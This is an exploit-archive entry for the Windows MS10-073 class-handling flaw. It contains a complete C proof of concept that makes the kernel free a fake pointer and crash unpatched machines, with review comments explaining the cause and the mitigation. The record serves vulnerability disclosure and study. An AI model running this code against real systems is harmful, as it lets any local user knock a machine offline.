MS10-073 Windows Class Handling Vulnerability

2011-01-03T00:00:00
ID 1337DAY-ID-15414
Type zdt
Reporter Tarjei Mandt
Modified 2011-01-03T00:00:00

Description

Exploit for the Windows platform, category: dos / poc

                                        
                                            #include <windows.h>
 
/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/
 
/*
 * Proof of concept for the MS10-073 class-handling bug named in the page
 * title. A plain user-mode window is re-tagged as a menu window and then
 * destroyed; per the inline comments below, the kernel then frees a
 * caller-chosen pointer (0x80808080) as if it were the popup-menu
 * structure. Nothing in this program survives that free, so the visible
 * effect is a crash (DoS), not code execution.
 *
 * Defensive reading:
 *  - Root cause, as the comments describe it: the window's fnid can be
 *    switched to FNID_MENU through MenuWindowProcA after creation, and
 *    DestroyWindow trusts that tag without checking how the window was
 *    created. NOTE(review): inferred from the comments on the two calls
 *    below and the blog post cited above; confirm against the advisory.
 *  - Mitigation is the MS10-073 update itself; unpatched hosts should be
 *    treated as crashable by any local user who can create a window.
 *
 * argc/argv are unused. Returns 0 unconditionally: none of the Win32
 * calls below have their results checked, so a failure (e.g. the class
 * not registering, or the export not resolving) is silently ignored and
 * the later calls run with a NULL handle/pointer.
 */
int main(int argc, char **argv)
{
    WNDCLASSA Class = {0};
    CREATESTRUCTA Cs = {0};     // zeroed; passed as lParam of WM_NCCREATE below
    FARPROC MenuWindowProcA;
    HMODULE hModule;
    HWND hWindow;
 
    Class.lpfnWndProc = DefWindowProc;
    Class.lpszClassName = "Class";
    // Reserve one pointer-sized slot of per-window extra bytes; offset 0 of
    // this slot is what SetWindowLongPtr writes below.
    Class.cbWndExtra = sizeof(PVOID);
 
    RegisterClassA(&Class);     // NOTE(review): ATOM result unchecked
 
    hModule = LoadLibraryA("USER32.DLL");   // NOTE(review): NULL on failure, unchecked
 
    // Resolved by name rather than declared, presumably because it is not
    // in the public SDK headers. NULL if the export is absent (unchecked).
    MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");
 
    // Ordinary top-level 32x32 window of the class registered above.
    // NOTE(review): hWindow may be NULL and is not checked.
    hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
 
    // set the pointer value of the (soon to be) popup menu structure
    // 0x80808080 is an arbitrary value, not a real allocation: it only has
    // to be something the kernel will later hand to its pool free. It is a
    // 32-bit literal, so on a 64-bit build the stored LONG_PTR is
    // 0x0000000080808080 — TODO confirm which architecture the PoC targets.
    SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);
 
    // set WND->fnid = FNID_MENU
    // Five arguments are pushed through an unprototyped FARPROC; the
    // compiler cannot check them against the real signature, so this
    // relies on the calling convention happening to line up — verify
    // against the actual MenuWindowProcA prototype.
    MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);
 
    // trigger -> ExPoolFree(0x80808080)
    // Freeing a pointer that was never allocated is expected to bugcheck
    // the machine (the DoS); the return below is never reached on a
    // vulnerable system.
    DestroyWindow(hWindow);
 
    return 0;
}


